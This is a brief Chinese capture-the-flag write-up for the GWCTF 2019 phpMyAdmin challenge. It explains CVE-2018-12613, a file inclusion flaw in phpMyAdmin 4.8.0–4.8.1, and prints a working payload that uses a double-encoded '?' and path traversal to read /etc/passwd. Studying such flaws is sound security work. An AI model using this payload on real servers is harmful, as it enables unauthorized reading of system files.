[GWCTF 2019]我有一个数据库 - phpmyadmin4.8.1

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞

影响版本：4.8.0——4.8.1

payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd

这里的解析会将?二次编码当成目录 不止? #也可以实现这个效果

参考链接1

参考链接2